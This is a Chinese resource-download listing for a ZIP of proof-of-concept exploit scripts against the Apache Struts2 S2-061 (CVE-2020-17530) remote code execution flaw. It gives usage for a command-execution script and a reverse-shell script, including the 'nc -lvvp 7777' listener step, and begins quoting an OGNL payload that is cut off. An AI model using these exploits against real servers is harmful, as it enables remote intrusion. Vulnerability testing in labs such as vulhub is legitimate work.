登录 注册
当前位置:主页 > 资源下载 > 50 > S2-061的CVE-2020-17530payload,以及相应的简易PoCExp

S2-061的CVE-2020-17530payload,以及相应的简易PoCExp

  • 更新:2024-09-23 10:00:26
  • 大小:4KB
  • 推荐:★★★★★
  • 来源:网友上传分享
  • 类别:其它 - 开发技术
  • 格式:ZIP

资源介绍

S2-061 脚本皆根据vulhub的struts2-059/061漏洞测试环境来写的,不具普遍性,还望大佬多多指教 struts2-061-poc.py(可执行简单系统命令) 用法:python struts2-061-poc.py command 例子:python struts2-061-poc.py whoami S2-061-shell.py(可反弹shell) 用法: 首先在一台机器A上监听指定端口(例如:nc -lvvp 7777) 执行脚本:python2 S2-061-shell.py target_url,其中target_url为漏洞环境地址,形式为 根据脚本提示输入A机器的IP及所监听的端口,即可在机器A的监听窗口获取到shell 以下是几个大佬搞出来的payload: payload-1:(from ka1n4t) %{(#instancemanager=#a